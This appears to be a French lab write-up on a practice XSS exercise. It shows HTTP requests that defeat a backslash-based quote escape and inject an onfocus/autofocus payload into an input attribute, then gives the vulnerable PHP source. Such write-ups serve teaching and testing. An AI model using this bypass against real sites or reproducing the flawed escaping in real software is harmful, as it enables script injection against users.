Exploitation
Afin de protéger l'application, l'auteur indique qu'il échappe maintenant le caractère " :
Le caractère " subit effectivement un traitement, il s'agit d'un échappement par l'insertion du caractère \ :
Copier POST /xss6/ HTTP / 1.1
Host : localhost:9003
User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type : application/x-www-form-urlencoded
Content-Length : 33
Origin : http://localhost:9003
Connection : close
Referer : http://localhost:9003/xss6/
search=whatever%22&submit=Envoyer
Copier HTTP/1.1 200 OK
Server: Apache/2.4.53 (Debian)
X-Powered-By: PHP/8.0.18
Content-Length: 2100
Connection: close
Content-Type: text/html; charset=UTF-8
< div class = "form-group col-md-2" >
< input type = "text" class = "form-control" id = "search" name = "search" value = "whatever\" " placeholder = "keyword" required >
</ div > Le contournement qui me parait le plus évident à tester est d'insérer également un caractère \ afin d'échapper l'échappement :
Copier POST /xss6/ HTTP / 1.1
Host : localhost:9003
User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type : application/x-www-form-urlencoded
Content-Length : 36
Origin : http://localhost:9003
Connection : close
Referer : http://localhost:9003/xss6/
search=whatever%5C%22&submit=Envoyer
Copier HTTP/1.1 200 OK
Server: Apache/2.4.53 (Debian)
X-Powered-By: PHP/8.0.18
Content-Length: 2101
Connection: close
Content-Type: text/html; charset=UTF-8
< div class = "form-group col-md-2" >
< input type = "text" class = "form-control" id = "search" name = "search" value = "whatever\\" " placeholder = "keyword" required >
</ div > Cela semble fonctionner :
Il ne me reste plus qu'à adapter ma payload basée sur l'autofocus whatever\" onfocus=alert(1) autofocus x=\" (attention, j'enlève également les guillemets autour du code Javascript) :
Copier POST /xss6/ HTTP / 1.1
Host : localhost:9003
User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type : application/x-www-form-urlencoded
Content-Length : 80
Origin : http://localhost:9003
Connection : close
Referer : http://localhost:9003/xss6/
search=whatever%5C%22+onfocus%3Dalert%281%29+autofocus+x%3D%5C%22&submit=Envoyer
Copier HTTP/1.1 200 OK
Server: Apache/2.4.53 (Debian)
X-Powered-By: PHP/8.0.18
Content-Length: 2134
Connection: close
Content-Type: text/html; charset=UTF-8
< div class = "form-group col-md-2" >
<input type="text" class="form-control" id="search" name="search" value="whatever\\" onfocus=alert(1) autofocus x=\\"" placeholder="keyword" required>
</ div > Analyse du code source
La fonction xss_check() effectue un traitement sur le caractère " qui se retrouve échappé par l'ajout d'un \ devant chaque occurrence. Le mot clé est ensuite affiché en tant que valeur de l'attribut HTML value :
Copier <? php
if ( isset ( $_POST[ 'submit' ] ) && isset ( $_POST[ 'search' ] ) ) {
$keyword = $_POST[ 'search' ];
}
function xss_check ($data) {
$input = str_replace ( '"' , '\"' , $data ) ;
$input = urldecode ( $input ) ;
return $input;
}
?>
< div class= "row" >
< form name = "forgetPass" method = "post" >
< div class= "form-group col-md-2" >
<input type="text" class="form-control" id="search" name="search" value="<?php if (isset ($keyword) && !empty ($keyword)){ echo xss_check($keyword); }?>" placeholder="keyword" required>
</ div >
< div class= "form-group col-md-2" >
< input type = "submit" class= "form-control btn btn-default" name = "submit" >
</ div >
</ form >
</ div > 
